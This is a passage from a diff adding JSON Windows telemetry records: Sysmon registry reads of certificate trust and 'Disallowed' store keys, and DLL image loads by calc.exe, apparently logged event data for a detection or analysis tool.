"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "twinui.appcore.dll", + "image_path": "C:\\Windows\\System32\\twinui.appcore.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573244960000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573246980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573246980000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ExtendViewIntoTitleBar", + "registry_value": "ExtendViewIntoTitleBar", + "timestamp": 131883573246980000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "image_load", + "image_name": "CoreUIComponents.dll", + "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "BCP47mrm.dll", + "image_path": "C:\\Windows\\System32\\BCP47mrm.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573246200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "Windows.UI.dll", + "image_path": "C:\\Windows\\System32\\Windows.UI.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573246360000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "TextInputFramework.dll", + "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573246360000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247450016, + "unique_pid": 